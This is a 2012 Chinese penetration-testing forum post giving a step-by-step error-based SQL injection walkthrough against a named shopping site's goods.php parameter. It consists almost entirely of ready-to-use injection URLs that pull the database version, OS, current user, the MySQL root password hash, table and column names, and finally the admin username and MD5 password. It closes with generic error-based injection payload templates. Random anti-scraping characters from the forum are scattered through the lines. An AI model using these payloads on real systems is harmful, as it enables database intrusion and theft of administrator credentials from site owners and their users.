找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2819|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
4 }7 `- ], d$ w% e  O6 Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ [2 i, _* P1 r8 e0 M' K$ G

, i" A, O4 l: J判断系统9 l# J4 t3 w/ [' u
/ u3 Z% v  X0 _  S. N. R: a* d/ `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. t$ Q( S4 |( c$ s
9 W: W  b# Y! d  c4 X' o* M' p( e6 b
7 c' U9 t* R) E: L6 T* P3 L" U- j& T* _; t
当前 user()
+ a; P! a$ D* k3 E5 p! k* _1 M' A
* O0 l5 j9 [* E* D5 r$ m; R' hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 G0 w' B* y5 |  H' z3 k5 ~
" {9 J% ]" q2 i: I! y1 X  T, j6 \0 |" q$ F* J! x& y8 q6 ?0 i) y

9 o  H! Z2 \  k当前 database()
! k+ E& v, Z& h/ p& Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ y- d0 A  |* v# ]! J8 ~# Q; f: m& \- n2 p, n$ N1 d# S, t! X# {) J7 Q
1 {2 U9 G' c) E6 _
7 g) c) \7 u6 `: G8 @
( E7 {: U3 Z; \; `, F7 _- U. g5 Y1 S
root hash
5 W+ A, V3 C1 W; @6 y' p* o8 k
7 ^, U% F3 B  J  }http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 i' v  ^9 O2 z2 R$ X( Z3 h: S! A3 q( q" w+ g6 e+ n

7 F8 ?+ U2 s. _  T% U
. ~  a, `7 G, G: v0 u' [$ n当前 数据库表名
; E/ U% |& @8 i) g! t  l( r
4 q. j& D4 w$ }  }7 }+ N( c+ P9 Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; a) V3 J* P" ]

( b; v! b. Q( v* c# \) n0 }! t3 Q3 m; Z) q" v+ X
8 Z6 O" i) g, j
当前 数据库 user_name 字段
6 g) M- p9 O+ J8 T; i3 v9 O: \2 y: I$ A3 X( {9 D, w
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 E& e1 y$ [8 e/ r; G/ C$ ?% L9 V+ }* l& J" i3 R1 H2 X
当前 数据库 字段 password8 Z' N5 s7 M9 {
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# ]) k- t' d7 J" X) G2 D

) V0 o! w, q: |: ~. V
0 c; |3 M7 }5 T$ |8 J7 Q4 ]
4 d: H% Q/ ~7 S1 }! k7 y获得 admin passwd(md5)* z( a$ `8 q3 ~% F% D! N, E

% v) ~: d* }" U2 u/ s4 M1 s& i  T5 @" t. K- r! z0 t
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* @* B" Q+ d2 q: A! S; p% W

8 M& z4 x3 u. v; I! ]报错注射) V" q  i' O- v
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
# I- w) J& z& y  ]$ J4 Q& j( d' z0 W. h' L, E
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
% d9 r. y! o; G8 s5 Y
' ?+ ~! z7 d* b0 yand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表